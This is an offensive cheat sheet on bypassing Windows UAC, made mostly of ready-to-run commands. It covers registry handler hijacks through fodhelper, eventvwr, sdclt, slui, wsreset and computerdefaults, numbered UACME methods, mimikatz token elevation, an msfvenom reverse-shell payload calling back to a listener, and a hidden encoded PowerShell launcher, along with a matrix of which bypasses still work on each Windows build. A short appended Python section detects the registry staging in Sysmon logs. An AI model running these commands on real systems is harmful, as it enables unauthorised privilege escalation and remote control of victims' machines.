UAC Bypass
When you have an Administrator account but only a medium-integrity shell, a UAC bypass elevates without a prompt.
i. Where you stand
UAC only matters if you’re already in the local Administrators group. Confirm:
whoami /groups | findstr /i "S-1-5-32-544 Administrators"
Check current integrity:
whoami /groups | findstr /i "Mandatory Label"
## "High Mandatory Level" = elevated, no bypass needed
## "Medium Mandatory Level" = needs UAC bypass
Check UAC config:
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA
Values:
- EnableLUA=0 -> UAC disabled entirely, no bypass needed, all admins run elevated
- ConsentPromptBehaviorAdmin=0 -> auto-elevate for admins (silent), no bypass needed
- ConsentPromptBehaviorAdmin=5 -> default, prompt for non-Windows binaries
- ConsentPromptBehaviorAdmin=2 -> always prompt for credentials (strictest)
ii. The fundamental trick
Some Microsoft binaries are flagged to auto-elevate without prompting. If one of them reads a registry key you control (HKCU), and that key tells it what to execute, you get elevation for free.
Find auto-elevate binaries:
sigcheck.exe -m C:\Windows\System32\*.exe | findstr /i autoelevate
Or use the known targets below.
iii. Fodhelper bypass (Win10/11)
The most reliable bypass for years. Fodhelper.exe auto-elevates and reads a registry path that doesn’t exist by default in HKCU:
reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /d "C:\Windows\Temp\sh.exe" /f
reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /f
fodhelper.exe
## sh.exe runs as elevated (high integrity)
## Clean up:
reg delete "HKCU\Software\Classes\ms-settings" /f
iv. ComputerDefaults bypass
Same mechanism, different auto-elevate binary:
reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /d "C:\Windows\Temp\sh.exe" /f
reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /f
computerdefaults.exe
v. EventVwr bypass (classic)
reg add "HKCU\Software\Classes\mscfile\shell\open\command" /d "C:\Windows\Temp\sh.exe" /f
eventvwr.exe
reg delete "HKCU\Software\Classes\mscfile" /f
Patched on most modern Windows but worth trying on older boxes.
vi. SDCLT bypass (Win10)
Backup tool that auto-elevates:
reg add "HKCU\Software\Classes\Folder\shell\open\command" /d "C:\Windows\Temp\sh.exe" /f
reg add "HKCU\Software\Classes\Folder\shell\open\command" /v DelegateExecute /f
sdclt.exe /KickOffElev
vii. SLUI bypass
reg add "HKCU\Software\Classes\exefile\shell\open\command" /d "C:\Windows\Temp\sh.exe" /f
reg add "HKCU\Software\Classes\exefile\shell\open\command" /v DelegateExecute /f
slui.exe
viii. WSReset bypass
reg add "HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command" /d "C:\Windows\Temp\sh.exe" /f
reg add "HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command" /v DelegateExecute /f
wsreset.exe
ix. UACME framework
Akagi/UACME has 60+ bypass techniques numbered as methods. Drop the binary, pick a method:
Akagi64.exe 23 C:\Windows\Temp\sh.exe
Akagi64.exe 33 C:\Windows\Temp\sh.exe
Akagi64.exe 41 C:\Windows\Temp\sh.exe
Method numbers to try first (most reliable across versions):
- 23 -> fodhelper
- 33 -> sdclt
- 41 -> computerdefaults
- 56 -> wsreset
- 61 -> very modern, Win11
When one fails, try the next number; the framework is designed for this.
x. DLL hijack of auto-elevate
When the registry tricks are patched, side-load a DLL into an auto-elevate binary. Same mechanic as the DLL hijack in PrivEsc - DLL & Unquoted Paths, but here the target binary auto-elevates:
## Plant a malicious DLL where an auto-elevate exe loads it from a writable user dir
## Example targets: Microsoft.Office.* binaries, OneDriveSetup.exe
xi. Token impersonation when admin
Already admin in a medium shell? Steal a high-integrity token from a SYSTEM process you own:
mimikatz.exe
privilege::debug
token::elevate
Or with PowerShell + Sherlock/PowerUp’s Get-SystemTokens.
This is the “I’m admin but my shell is medium” case where you bypass UAC by stealing the elevated token of an existing process you own.
xii. Build the payload
For all the registry tricks above, you point at an executable. Make it a real callback, not just cmd:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f exe -o sh.exe
Or PowerShell oneliner in the registry value:
reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /d "powershell.exe -nop -w hidden -enc <base64>" /f
xiii. UAC and PSRemoting
A subtle gotcha: WinRM / PSRemoting from a remote admin already gives you a high-integrity token (no UAC filter applied to remote logons by default). If you can pivot via WinRM, you skip UAC entirely:
evil-winrm -i target -u Administrator -p 'pass'
## You're already elevated, no UAC bypass needed
See Lateral Movement.
xiv. Tested-bypass matrix
| OS | Fodhelper | Computer-Defaults | SDClt | WSReset | UACME #61 |
|---|---|---|---|---|---|
| Win10 1809 | Yes | Yes | Yes | Yes | n/a |
| Win10 21H2 | Yes (variant) | Yes | Yes | Yes | n/a |
| Win11 21H2 | Yes (variant) | Patched | Yes | Yes | Yes |
| Win11 23H2 | Patched | Patched | Patched | Patched | Yes |
| Server 2019 | Yes | Yes | n/a | n/a | n/a |
| Server 2022 | Patched | Patched | n/a | n/a | n/a |
Always test several. Patched techniques come back in re-introduced variants, and behaviour varies between OS builds.
xv. Cleanup
reg delete "HKCU\Software\Classes\ms-settings" /f 2>nul
reg delete "HKCU\Software\Classes\mscfile" /f 2>nul
reg delete "HKCU\Software\Classes\Folder" /f 2>nul
reg delete "HKCU\Software\Classes\exefile" /f 2>nul
reg delete "HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2" /f 2>nul
See Persistence & Cleanup for the full Windows cleanup pass.
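The one thing every registry technique above has in common is a per-user write to a Classes\...\command handler (plus an empty DelegateExecute value) that Sysmon Event ID 13 records, which is what a defender keys on. The Python below is an added detection example, not from this page or from UACME; the SIEM record shape, the user SID, the technique labels and the file paths are constructed assumptions.

```python
# Per-user (HKCU) staging keys consulted by the auto-elevate binaries above. Sysmon logs HKCU
# as HKU\<SID>; the same paths under HKLM are the legitimate machine-wide handlers.
STAGING_KEYS = {
    r"software\classes\ms-settings\shell\open\command": "fodhelper/computerdefaults",
    r"software\classes\mscfile\shell\open\command": "eventvwr",
    r"software\classes\folder\shell\open\command": "sdclt",
    r"software\classes\exefile\shell\open\command": "slui",
    r"software\classes\appx82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command": "wsreset",
}

# Constructed Sysmon Event ID 13 (RegistryEvent: value set) records as a SIEM would deliver them.
HIVE = r"HKU\S-1-5-21-111-222-333-1001"  # constructed user SID, not a real one
SAMPLE_EVENTS = [
    {"EventID": 13, "EventType": "SetValue", "Image": r"C:\Windows\System32\reg.exe", "User": r"LAB\alice",
     "TargetObject": HIVE + r"\Software\Classes\ms-settings\Shell\Open\command\(Default)",
     "Details": r"C:\Windows\Temp\sh.exe"},
    {"EventID": 13, "EventType": "SetValue", "Image": r"C:\Windows\System32\reg.exe", "User": r"LAB\alice",
     "TargetObject": HIVE + r"\Software\Classes\ms-settings\Shell\Open\command\DelegateExecute",
     "Details": "(Empty)"},
    {"EventID": 13, "EventType": "SetValue", "Image": r"C:\Windows\System32\msiexec.exe", "User": "NT AUTHORITY\\SYSTEM",
     "TargetObject": r"HKLM\Software\Classes\ms-settings\Shell\Open\command\(Default)",
     "Details": "<legitimate machine-wide handler, constructed>"},  # must NOT alert
]

def classify(target):
    """(technique, value name) if target is a staging key inside a user hive, else None."""
    low = target.lower()
    if not low.startswith("hku\\"):
        return None  # HKLM handler is the normal registration, only the HKCU override is suspect
    for suffix, technique in STAGING_KEYS.items():
        idx = low.find(suffix)
        if idx != -1:
            return technique, target[idx + len(suffix):].lstrip("\\") or "(Default)"
    return None

def find_uac_staging(events):
    """One alert per SetValue event that writes a UAC-bypass handler under HKCU."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 13 or ev.get("EventType") != "SetValue":
            continue
        hit = classify(ev.get("TargetObject", ""))
        if hit is None:
            continue
        technique, value_name = hit
        alerts.append({"technique": technique, "value": value_name, "payload": ev.get("Details", ""),
                       # an empty DelegateExecute value is what makes the shell run the handler silently
                       "silent_handler": value_name.lower() == "delegateexecute",
                       "writer": ev.get("Image", ""), "user": ev.get("User", "")})
    return alerts
```

Pair an alert with a later Process Create (Event ID 1) of fodhelper.exe, computerdefaults.exe, eventvwr.exe, sdclt.exe, slui.exe or wsreset.exe from the same user to confirm the bypass fired rather than just being staged.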